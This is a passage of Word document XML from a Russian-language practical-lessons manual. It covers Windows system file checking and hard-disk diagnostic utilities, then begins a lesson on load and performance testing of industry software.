                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Проверка целостности системы:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> команды</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t xml:space="preserve"> SFC/SCANNOW</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> (Проверка системных файлов) проверяет целостность всех защищенных системных файлов Windows 7 и заменяет неправильные и поврежденные версии на правильные версии, если это возможно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Зайдите в меню Пуск и в поле поиска наберите CMD затем щелкните правой кнопкой мыши по нему и нажмите на кнопку Запуск от имени администратора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. Затем введите тип </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SFC/SCANNOW</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Эта статья поможет вам проанализировать SFC журналы .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Диагностика оборудования:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Следующим шагом я бы порекомендовал запустить сканирование оборудования, чтобы убедиться, что нет аппаратных сбоев вызывающих крах системы. Сначала проверьте ОЗУ следуя статьям, которые объясняют вам процесс </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced Memory Diagnostic на Windows 7, с </w:t>
      </w:r>
      <w:hyperlink r:id="rId290" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="auto"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Memtest86 +</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>запустите диагностику жесткого диска ,каждый производитель как правило имеет свои собственные диагностические средства проверки жестких дисков</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>HDD Observer 3.0.1 Pro</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> – программа следит за состоянием жестких дисков, контролирует производительность и температуру, а также проверяет фрагментацию файловой системы и реестра. При этом проверка фрагментации происходит только в тот момент, когда компьютер </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>простаивает</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> и все системные ресурсы свободны. Скачать бесплатно программу проверки жесткого диска,можно по следующей ссылке – </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>HDD Observer 3.0.1 Pro</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2097987" cy="1404000"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="795" name="Рисунок 16" descr="http://kompkimi.ru/wp-content/uploads/2012/03/HDD-Observer-3.0.1-Pro.jp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kompkimi.ru/wp-content/uploads/2012/03/HDD-Observer-3.0.1-Pro.jpg">
                      <a:hlinkClick r:id="rId291"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId292" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2097741" cy="1403836"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Не менее интересная и полезная программа для жестких дисков – </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Flobo Hard Disk Repair</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> – эта программа включает различные инструменты для обслуживания жестких дисков : инструмент ремонта дефектного сектора, тест скорости,информацию S.M.A.R.T. ,тест поверхности жесткого диска, проверка медиа стабильности и тест котроллера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2450550" cy="1409447"/>
            <wp:effectExtent l="19050" t="0" r="6900" b="0"/>
            <wp:docPr id="781" name="Рисунок 17" descr="http://kompkimi.ru/wp-content/uploads/2012/03/Flobo-Hard-Disk-Repair.jp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kompkimi.ru/wp-content/uploads/2012/03/Flobo-Hard-Disk-Repair.jpg">
                      <a:hlinkClick r:id="rId293"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId294" cstate="print">
                      <a:lum bright="20000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2450592" cy="1409471"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Flobo Hard Disk Repair</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> использует S.M.A.R.T. технологию для контроля статуса здоровья жесткого диска,тем самым предотвращает потерю данных и предсказывает возможные отказы диска. Также программа включает HDDBadSectorRepair (технологию ремонта и восстановления плохих секторов на жестком диске). Скачать бесплатно </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Flobo Hard Disk Repair</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> ,можно по следующей ссылке </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Flobo Hard Disk Repair.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Последнее, но не менее важное , версия используемой законной Windows. Незаконная или копия с торрента может показаться удобной, но Вы подвергаете ваши данные безопасности и риску, и это может вызвать много вопросов к вашей операционной системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Контрольные вопросы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="0098573C" w:rsidP="0067279E">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>технология для контроля статуса здоровья жесткого диска</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098573C" w:rsidRPr="00617AC0" w:rsidRDefault="0098573C" w:rsidP="0098573C">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="_Toc26278733"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое занятие № 14 Тестирование </w:t>
      </w:r>
      <w:r w:rsidR="000469BD" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>производительности</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> программного обеспечения отраслевой направленности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="0098573C" w:rsidP="0098573C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rStyle w:val="rtxt"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="rtxt"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="rtxt"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D9588A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков тестирования программного обеспечения.</w:t>
      </w:r>
      <w:r w:rsidR="00D9588A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="rtxt"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="rtxt"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Изучить на примере методику выбора критериев тестирования</w:t>
      </w:r>
      <w:bookmarkStart w:id="139" w:name="sect1"/>
      <w:bookmarkEnd w:id="139"/>
      <w:r w:rsidR="00434EE5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="rtxt"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> производительности программного обеспечения отраслевой направленности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098573C" w:rsidRPr="00617AC0" w:rsidRDefault="0098573C" w:rsidP="0098573C">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434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание1. </w:t>
      </w:r>
      <w:r w:rsidR="00434EE5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование программного обеспечения отраслевой направленности на предельных нагрузках.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Краткое теоретическое обоснование:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Нагрузочное тестирование</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Современное программное обеспечение просто обязано бесперебойно работать под колоссальными нагрузками. Любого рода проблемы, связанные с плохой производительностью, могут стать причиной отказа клиентов от использования вашего ПО. В связи с этим, проведение качественного нагрузочного тестирования должно стать обязательным, для обеспечения стабильности работы ваших приложений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Теперь давайте ответим на вопрос: "Что же такое нагрузочное тестирование?", и постараемся более подробно описать процесс проведения нагрузочного тестирования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Нагрузочное тестирование (Load Testing) или тестирование производительности (Performance Testing) - это автоматизированное тестирование, имитирующее работу определенного количества бизнес пользователей на каком-либо общем (разделяемом ими) ресурсе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Начиная работу в области нагрузочного тестирования, следует четко понимать, что это не просто запись и прогон (Record and Playback) скриптов, а более сложный процесс:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Во-первых, нагрузочное тестирование - это серьезная исследовательская и аналитическая работа</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Во-вторых - это реальное автоматизированное тестирование, требующее серьезных навыков программирования, а также знания сетевых протоколов и различных серверов приложений и баз данных</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В-третьих - существуют разные виды нагрузочного тестирования, ставящие перед собой разные цели</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цели нагрузочного тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основными целями нагрузочного тестирования являются:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Оценка производительности и работоспособности приложения на этапе разработки и передачи в эксплуатацию</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Оценка производительности и работоспособности приложения на этапе выпуска новых релизов, патч-сетов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Оптимизация производительности приложения, включая настройки серверов и оптимизацию кода</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Подбор соответствующей для данного приложения аппаратной (программной платформы) и конфигурации сервера</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Заметим, что в рамках одной цели могут использоваться разные виды тестов производительности и нагрузки, например, для первой, второй и третьей цели нужно производить</w:t>
      </w:r>
      <w:r w:rsidR="00D9588A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> как тестирование производительности</w:t>
      </w:r>
      <w:r w:rsidR="00D9588A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> так и тестирование стабильности. Но при планировании нагрузочного тестирования логичнее все же отталкиваться от технических целей (а не коммерческих, перечисленных выше), которые достигаются в результате тестирования и классифицировать тесты по ним:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если интересует исследование производительности приложения, а именно времена отклика для операций на разных нагрузках в довольно широких диапазонах, включая стрессовые нагрузки то это все таки тестирование производительности (Performance Testing)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если целью является понимание насколько приложение устойчиво в режиме длительного использования (исключение утечек памяти, некорректных конфигурационных настроек и т.д.) то проводится долгий нагрузочный тест - это тестирование стабильности (Stability Testing). При этом анализ времен отклика может иметь место, но не быть первым приоритетом, главное чтобы система "не упала".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
